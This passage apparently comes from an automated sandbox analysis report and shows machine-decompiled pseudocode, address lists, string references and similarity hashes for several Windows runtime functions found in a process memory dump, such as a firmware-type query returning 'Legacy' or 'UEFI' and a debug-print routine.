0x0169e5b9
0x0169e5be
0x0169e5c0
0x0169e5c2
0x0169e5c8
0x0169e5c9
0x0169e5cb
0x0169e5cc
0x0169e5d5
0x0169e5e4
0x0169e5f1
0x0169e5f8
0x0169e5f8
0x0169e5d5
0x0169e602
0x0169e616
0x0169e63d
0x0169e644
0x0169e64d
0x0169e652
0x0169e657
0x0169e659
0x0169e65b
0x0169e661
0x0169e662
0x0169e664
0x0169e665
0x0169e66e
0x0169e67d
0x0169e68a
0x0169e691
0x0169e691
0x0169e66e
0x0169e6b0
0x00000000
0x0169e6b6
0x0169e6bd
0x0169e6c7
0x0169e6d7
0x0169e6d9
0x0169e6db
0x0169e6de
0x0169e6e3
0x0169e6f3
0x0169e6fc
0x0169e700
0x0169e700
0x0169e704
0x0169e70a
0x0169e70a
0x0169e713
0x0169e716
0x0169e719
0x0169e720
0x0169e761
0x0169e76b
0x0169e774
0x0169e77a
0x0169e77a
0x0169e78a
0x0169e791
0x0169e799
0x0169e79b
0x0169e79f
0x0169e7aa
0x0169e7c0
0x0169e7ac
0x0169e7b2
0x0169e7b9
0x0169e7b9
0x0169e7c7
0x0169e806
0x00000000
0x0169e7c9
0x0169e7d1
0x0169e7d8
0x00000000
0x0169e7d8
0x00000000
0x00000000
0x0169e722
0x0169e72e
0x0169e748
0x0169e74c
0x0169e754
0x0169e756
0x0169e75c
0x0169e75c
0x00000000
0x0169e75c
0x0169e758
0x0169e758
0x00000000
0x0169e758
0x0169e750
0x00000000
0x00000000
0x0169e752
0x00000000
0x0169e752
0x0169e730
0x0169e735
0x0169e73d
0x0169e73f
0x00000000
0x00000000
0x0169e741
0x0169e741
0x00000000
0x0169e741
0x0169e739
0x00000000
0x00000000
0x0169e73b
0x00000000
0x0169e73b
0x0169e722
0x0169e720
0x0169e6b0
0x0169e618
0x00000000
0x0169e618

Strings

`, xrefs: 0169E5D7
`, xrefs: 0169E670

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: 69595a03c89312fc55a60e026a4a3d4eec563bc28624b0ff3ad7dc92e7135ba4
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction Fuzzy Hash: E29185312043429FEB24CE69CD41B6BBBDABF84714F14892DF695CB280D775E904CB52

Uniqueness

Uniqueness Score: -1.00%

Function 016551BE, Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E016551BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x16b05f0);
				E0162D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E015EEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E016553CA(0);
						return E0162D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0161F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E015F3690(1, _t117, 0x15b1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0161AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L015F4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0161AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0165500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E01619860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x016551be
0x016551c3
0x016551c8
0x016551cd
0x016551d0
0x016551d3
0x016551d8
0x016551db
0x016551de
0x016551e0
0x016551e3
0x016551e6
0x016551e8
0x01655342
0x01655351
0x01655356
0x0165535a
0x01655360
0x01655363
0x01655366
0x01655369
0x01655369
0x0165536b
0x0165536b
0x01655370
0x016553a3
0x016553a4
0x016553a6
0x016553ab
0x016553ab
0x016553ae
0x016553ae
0x016553b5
0x016553bf
0x016553bf
0x01655375
0x01655396
0x016553a0
0x016553a0
0x00000000
0x01655396
0x01655377
0x01655379
0x0165537f
0x0165538c
0x01655390
0x00000000
0x01655390
0x016551ee
0x016551f1
0x01655301
0x01655310
0x01655315
0x01655318
0x0165531b
0x01655320
0x0165532e
0x01655331
0x00000000
0x01655331
0x01655328
0x01655329
0x00000000
0x01655329
0x016551fa
0x01655235
0x01655236
0x01655239
0x0165523f
0x01655240
0x01655241
0x01655242
0x01655246
0x01655247
0x0165524e
0x01655251
0x01655267
0x01655269
0x0165526e
0x0165527d
0x0165527e
0x01655281
0x01655282
0x01655287
0x01655288
0x0165528a
0x0165528f
0x01655294
0x00000000
0x00000000
0x0165529a
0x0165529c
0x0165529e
0x0165529e
0x016552a4
0x016552b0
0x00000000
0x00000000
0x016552ba
0x016552bc
0x016552bc
0x016552d4
0x016552d9
0x016552dc
0x016552e1
0x00000000
0x00000000
0x016552e7
0x016552f4
0x00000000
0x016552f4
0x01655270
0x00000000
0x01655270
0x016551fc
0x016551fd
0x01655202
0x01655203
0x01655205
0x0165520a
0x0165520f
0x00000000
0x00000000
0x0165521b
0x01655226
0x0165522b
0x0165521d
0x0165521d
0x01655222
0x01655222
0x0165522d
0x00000000

Strings

Legacy, xrefs: 01655226
UEFI, xrefs: 0165521D

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: aefae96cd453d67e41d82b78b2409720ffa7e8e11f402dcabe67ac2f7c3482ff
Instruction ID: 83042060ba03e2de29f2cd99c500080fc217a50965095deb7dd5ad5d2e14322d
Opcode Fuzzy Hash: aefae96cd453d67e41d82b78b2409720ffa7e8e11f402dcabe67ac2f7c3482ff
Instruction Fuzzy Hash: 12517E71E006099FDB64DFA8CD84AADBBF9FF48740F14402DEA4AEB252E7719941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 015FB944, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E015FB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x16cd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E015F7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E016A8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E01619E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0161B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0161CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E015F7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E016A8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0161AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x16c8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x16c862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x16c8628; // 0x0
							_t116 =  *0x16c862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x015fb94c
0x015fb956
0x015fb95c
0x015fb95e
0x015fb964
0x015fb969
0x015fb96d
0x015fb96d
0x015fb970
0x015fb974
0x015fb97a
0x015fbadf
0x015fbadf
0x015fbae2
0x015fbae4
0x015fbae6
0x015fbaf0
0x01642cb8
0x015fbaf6
0x015fbaf6
0x015fbaf6
0x015fbafd
0x015fbb1f
0x015fbb1f
0x015fbaff
0x015fbb00
0x015fbb00
0x015fbb03
0x015fbb03
0x015fbacb
0x015fbacf
0x015fbad0
0x015fbad1
0x015fbadc
0x015fbadc
0x015fb980
0x015fb980
0x015fb988
0x015fb98b
0x015fb98d
0x015fb990
0x015fb993
0x015fb999
0x015fb99b
0x015fb9a1
0x015fb9a5
0x015fb9aa
0x015fb9b0
0x015fb9bb
0x015fb9c0
0x015fb9c3
0x015fb9ca
0x015fb9cc
0x015fb9cf
0x015fb9d3
0x015fb9d7
0x015fba94
0x015fba94
0x015fba98
0x015fbaa3
0x01642ccb
0x015fbaa9
0x015fbaa9
0x015fbaa9
0x015fbab1
0x01642cd5
0x01642cdd
0x01642cdd
0x015fbabb
0x015fbabc
0x015fbac2
0x015fbac3
0x015fbac3
0x015fbac6
0x00000000
0x015fb9dd
0x015fb9dd
0x015fb9e7
0x015fb9e7
0x015fb9ec
0x015fb9ec
0x015fb9f1
0x015fb9f5
0x015fb9fa
0x015fba00
0x015fba0c
0x015fba10
0x015fba10
0x015fba12
0x015fba18
0x00000000
0x00000000
0x015fbb26
0x015fbb26
0x015fba1e
0x015fba1e
0x015fba23
0x015fba25
0x015fba2c
0x015fba30
0x015fba35
0x015fba35
0x015fba41
0x015fba46
0x015fba4c
0x015fba50
0x015fba54
0x015fba6a
0x015fba6e
0x015fba70
0x015fba74
0x015fba78
0x015fba7a
0x015fba7c
0x015fba8e
0x015fba90
0x015fba92
0x015fbb14
0x015fbb14
0x015fbb16
0x015fbb16
0x00000000
0x015fba7c
0x015fbb0a
0x015fbb0d
0x00000000
0x00000000
0x00000000
0x015fbb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015FB9A5

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 80a0987aba6b080b6a5e77df7734dc4f6eabaa3b850eb28793fcee3c30e02fb0
Instruction ID: 09b043664e1d8841b01b348a4103456c1176fbd0b14ee8f0900f783dabc1df4f
Opcode Fuzzy Hash: 80a0987aba6b080b6a5e77df7734dc4f6eabaa3b850eb28793fcee3c30e02fb0
Instruction Fuzzy Hash: DD515871A08351CFC720DF29C88092ABBF9FB88650F54896EF6D58B355D771E844CB92

Uniqueness

Uniqueness Score: -1.00%

Function 015DB171, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E015DB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x16af7a8);
				E0162D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0162D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0161D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0161F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0162DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0161B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0161B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0161E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0161A890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x015db171
0x015db171
0x015db171
0x015db171
0x015db171
0x015db176
0x015db17b
0x015db180
0x015db186
0x015db18f
0x015db198
0x015db1a4
0x015db1aa
0x01634802
0x01634802
0x01634805
0x0163480c
0x0163480e
0x015db1d1
0x015db1d3
0x015db1de
0x015db1de
0x01634817
0x0163481e
0x01634820
0x01634822
0x01634822
0x01634824
0x01634824
0x0163482a
0x00000000
0x00000000
0x01634835
0x0163483a
0x0163483d
0x0163483f
0x01634842
0x01634842
0x01634842
0x01634846
0x0163484c
0x0163484e
0x01634851
0x01634851
0x01634853
0x01634854
0x01634854
0x01634858
0x0163485a
0x0163485a
0x0163485d
0x0163485f
0x01634861
0x01634861
0x01634866
0x0163486b
0x0163486e
0x01634871
0x01634876
0x01634876
0x01634878
0x0163487b
0x01634884
0x01634884
0x00000000
0x0163487d
0x0163487d
0x01634882
0x01634889
0x01634889
0x0163488f
0x01634891
0x016348e0
0x016348e2
0x016348e4
0x016348e4
0x016348e7
0x016348e7
0x016348ed
0x016348f4
0x016348f6
0x01634951
0x01634951
0x01634953
0x01634953
0x01634956
0x01634956
0x01634958
0x01634959
0x01634959
0x0163495d
0x0163495d
0x0163495f
0x0163495f
0x01634965
0x01634969
0x016349ba
0x016349ba
0x016349c1
0x016349c5
0x016349cc
0x016349d4
0x016349d7
0x016349da
0x016349e4
0x016349e5
0x016349f3
0x01634a02
0x00000000
0x01634a02
0x01634972
0x01634974
0x00000000
0x00000000
0x01634976
0x01634979
0x01634982
0x01634983
0x01634984
0x0163498b
0x0163498d
0x01634991
0x01634993
0x01634999
0x0163499d
0x016349a2
0x016349a2
0x016349a2
0x01634999
0x016349ac
0x00000000
0x016349b3
0x016348f8
0x016348fe
0x00000000
0x00000000
0x00000000
0x016348fe
0x01634895
0x0163489c
0x016348ad
0x016348b2
0x016348b5
0x016348b7
0x016348ba
0x016348bc
0x016348c6
0x016348c6
0x016348cb
0x016348d1
0x016348d4
0x016348d8
0x016348d8
0x00000000
0x016348d8
0x016348be
0x016348c0
0x00000000
0x00000000
0x016348c2
0x00000000
0x00000000
0x00000000
0x016348c4
0x00000000
0x01634882
0x0163487b
0x01634904
0x01634906
0x00000000
0x00000000
0x01634908
0x0163490e
0x00000000
0x00000000
0x01634910
0x01634917
0x01634917
0x00000000
0x01634917
0x015db1ba
0x016347f9
0x016347fc
0x00000000
0x00000000
0x00000000
0x016347fc
0x015db1c0
0x015db1c0
0x015db1c3
0x015db1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 016348AD

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: eae94769b25d5b825a8ded6f722f6ceb94dc515631aa1362c1a00b7dbebc509d
Instruction ID: 301ea1b47e1453a931983f06d7146620624904e6b26166a23fe0900cffe2ae46
Opcode Fuzzy Hash: eae94769b25d5b825a8ded6f722f6ceb94dc515631aa1362c1a00b7dbebc509d
Instruction Fuzzy Hash: 2651C071D002598EEB31CF688C44BAEFBB1BF85710F1541ADD859AB382DB748945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 01602581, Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 82%

			E01602581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t235;
				signed int _t239;
				char* _t240;
				signed int _t244;
				signed int _t246;
				intOrPtr _t248;
				signed int _t251;
				signed int _t258;
				signed int _t261;
				signed int _t269;
				intOrPtr _t275;
				signed int _t277;
				signed int _t279;
				void* _t280;
				void* _t281;
				signed int _t282;
				unsigned int _t285;
				signed int _t289;
				void* _t290;
				signed int _t291;
				signed int _t295;
				intOrPtr _t307;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				signed int _t323;
				signed int _t324;
				intOrPtr* _t326;
				signed int _t328;
				signed int _t330;
				signed int _t333;
				void* _t334;
				void* _t336;

				_t330 = _t333;
				_t334 = _t333 - 0x4c;
				_v8 =  *0x16cd360 ^ _t330;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t323 = 0x16cb2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t285 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t275 = 0x48;
				_t305 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t316 = 0;
				_v37 = _t305;
				if(_v48 <= 0) {
					L16:
					_t45 = _t275 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
